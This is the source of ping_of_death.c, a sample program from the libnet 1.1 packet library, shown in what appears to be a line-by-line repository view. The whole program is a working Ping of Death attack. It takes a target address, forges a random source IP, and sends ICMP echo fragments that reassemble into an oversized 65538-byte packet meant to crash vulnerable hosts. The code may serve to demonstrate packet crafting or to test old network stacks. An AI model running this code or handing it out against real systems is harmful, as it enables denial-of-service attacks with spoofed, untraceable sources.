|
Packit Service |
b25606 |
/*
|
|
Packit Service |
b25606 |
* $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $
|
|
Packit Service |
b25606 |
*
|
|
Packit Service |
b25606 |
* libnet 1.1
|
|
Packit Service |
b25606 |
* ICMP ping of death attack
|
|
Packit Service |
b25606 |
*
|
|
Packit Service |
b25606 |
* Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
|
|
Packit Service |
b25606 |
* All rights reserved.
|
|
Packit Service |
b25606 |
*
|
|
Packit Service |
b25606 |
* Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org>
|
|
Packit Service |
b25606 |
* All rights reserved.
|
|
Packit Service |
b25606 |
*
|
|
Packit Service |
b25606 |
* Redistribution and use in source and binary forms, with or without
|
|
Packit Service |
b25606 |
* modification, are permitted provided that the following conditions
|
|
Packit Service |
b25606 |
* are met:
|
|
Packit Service |
b25606 |
* 1. Redistributions of source code must retain the above copyright
|
|
Packit Service |
b25606 |
* notice, this list of conditions and the following disclaimer.
|
|
Packit Service |
b25606 |
* 2. Redistributions in binary form must reproduce the above copyright
|
|
Packit Service |
b25606 |
* notice, this list of conditions and the following disclaimer in the
|
|
Packit Service |
b25606 |
* documentation and/or other materials provided with the distribution.
|
|
Packit Service |
b25606 |
*
|
|
Packit Service |
b25606 |
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
|
Packit Service |
b25606 |
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
Packit Service |
b25606 |
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
Packit Service |
b25606 |
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
|
Packit Service |
b25606 |
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
|
Packit Service |
b25606 |
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
|
Packit Service |
b25606 |
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
|
Packit Service |
b25606 |
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
|
Packit Service |
b25606 |
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
|
Packit Service |
b25606 |
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
|
Packit Service |
b25606 |
* SUCH DAMAGE.
|
|
Packit Service |
b25606 |
*
|
|
Packit Service |
b25606 |
*/
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
#if (HAVE_CONFIG_H)
|
|
Packit Service |
b25606 |
#include "../include/config.h"
|
|
Packit Service |
b25606 |
#endif
|
|
Packit Service |
b25606 |
#include "./libnet_test.h"
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
#define FRAG_LEN 1472
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
int
|
|
Packit Service |
b25606 |
main(int argc, char **argv)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
libnet_t *l;
|
|
Packit Service |
b25606 |
libnet_ptag_t ip;
|
|
Packit Service |
b25606 |
libnet_ptag_t icmp;
|
|
Packit Service |
b25606 |
struct libnet_stats ls;
|
|
Packit Service |
b25606 |
u_long fakesrc, target;
|
|
Packit Service |
b25606 |
u_char *data;
|
|
Packit Service |
b25606 |
int c, i, flags, offset, len;
|
|
Packit Service |
b25606 |
char errbuf[LIBNET_ERRBUF_SIZE];
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
printf("libnet 1.1 Ping of Death[raw]\n");
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
/*
|
|
Packit Service |
b25606 |
* Initialize the library. Root priviledges are required.
|
|
Packit Service |
b25606 |
*/
|
|
Packit Service |
b25606 |
l = libnet_init(
|
|
Packit Service |
b25606 |
LIBNET_RAW4, /* injection type */
|
|
Packit Service |
b25606 |
NULL, /* network interface */
|
|
Packit Service |
b25606 |
errbuf); /* errbuf */
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
if (l == NULL)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
|
|
Packit Service |
b25606 |
exit(EXIT_FAILURE);
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
|
|
Packit Service |
b25606 |
exit(EXIT_FAILURE);
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
/* get random src addr. */
|
|
Packit Service |
b25606 |
libnet_seed_prand(l);
|
|
Packit Service |
b25606 |
fakesrc = libnet_get_prand(LIBNET_PRu32);
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
data = malloc(FRAG_LEN);
|
|
Packit Service |
b25606 |
for (i = 0 ; i < FRAG_LEN ; i++)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
/* fill it with something */
|
|
Packit Service |
b25606 |
data[i] = 0x3a;
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
ip = LIBNET_PTAG_INITIALIZER;
|
|
Packit Service |
b25606 |
icmp = LIBNET_PTAG_INITIALIZER;
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
offset = i;
|
|
Packit Service |
b25606 |
flags = 0;
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
if (offset < 65120)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
flags = IP_MF;
|
|
Packit Service |
b25606 |
len = FRAG_LEN;
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
else
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
/* for a total reconstructed length of 65538 bytes */
|
|
Packit Service |
b25606 |
len = 410;
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
icmp = libnet_build_icmpv4_echo(
|
|
Packit Service |
b25606 |
ICMP_ECHO, /* type */
|
|
Packit Service |
b25606 |
0, /* code */
|
|
Packit Service |
b25606 |
0, /* checksum */
|
|
Packit Service |
b25606 |
666, /* id */
|
|
Packit Service |
b25606 |
666, /* sequence */
|
|
Packit Service |
b25606 |
data, /* payload */
|
|
Packit Service |
b25606 |
len, /* payload size */
|
|
Packit Service |
b25606 |
l, /* libnet handle */
|
|
Packit Service |
b25606 |
icmp); /* libnet ptag */
|
|
Packit Service |
b25606 |
if (icmp == -1)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
|
|
Packit Service |
b25606 |
goto bad;
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
/* no reason to do this */
|
|
Packit Service |
b25606 |
libnet_toggle_checksum(l, icmp, 0);
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
ip = libnet_build_ipv4(
|
|
Packit Service |
b25606 |
LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
|
|
Packit Service |
b25606 |
0, /* TOS */
|
|
Packit Service |
b25606 |
666, /* IP ID */
|
|
Packit Service |
b25606 |
flags | (offset >> 3), /* IP Frag */
|
|
Packit Service |
b25606 |
64, /* TTL */
|
|
Packit Service |
b25606 |
IPPROTO_ICMP, /* protocol */
|
|
Packit Service |
b25606 |
0, /* checksum */
|
|
Packit Service |
b25606 |
fakesrc, /* source IP */
|
|
Packit Service |
b25606 |
target, /* destination IP */
|
|
Packit Service |
b25606 |
NULL, /* payload */
|
|
Packit Service |
b25606 |
0, /* payload size */
|
|
Packit Service |
b25606 |
l, /* libnet handle */
|
|
Packit Service |
b25606 |
ip); /* libnet ptag */
|
|
Packit Service |
b25606 |
if (ip == -1)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
|
|
Packit Service |
b25606 |
goto bad;
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
c = libnet_write(l);
|
|
Packit Service |
b25606 |
if (c == -1)
|
|
Packit Service |
b25606 |
{
|
|
Packit Service |
b25606 |
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
/* tcpdump-style jonks. */
|
|
Packit Service |
b25606 |
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
|
|
Packit Service |
b25606 |
argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
libnet_stats(l, &ls);
|
|
Packit Service |
b25606 |
fprintf(stderr, "Packets sent: %lld\n"
|
|
Packit Service |
b25606 |
"Packet errors: %lld\n"
|
|
Packit Service |
b25606 |
"Bytes written: %lld\n",
|
|
Packit Service |
b25606 |
ls.packets_sent, ls.packet_errors, ls.bytes_written);
|
|
Packit Service |
b25606 |
libnet_destroy(l);
|
|
Packit Service |
b25606 |
free(data);
|
|
Packit Service |
b25606 |
return (EXIT_SUCCESS);
|
|
Packit Service |
b25606 |
bad:
|
|
Packit Service |
b25606 |
libnet_destroy(l);
|
|
Packit Service |
b25606 |
free(data);
|
|
Packit Service |
b25606 |
return (EXIT_FAILURE);
|
|
Packit Service |
b25606 |
}
|
|
Packit Service |
b25606 |
|
|
Packit Service |
b25606 |
/* EOF */
|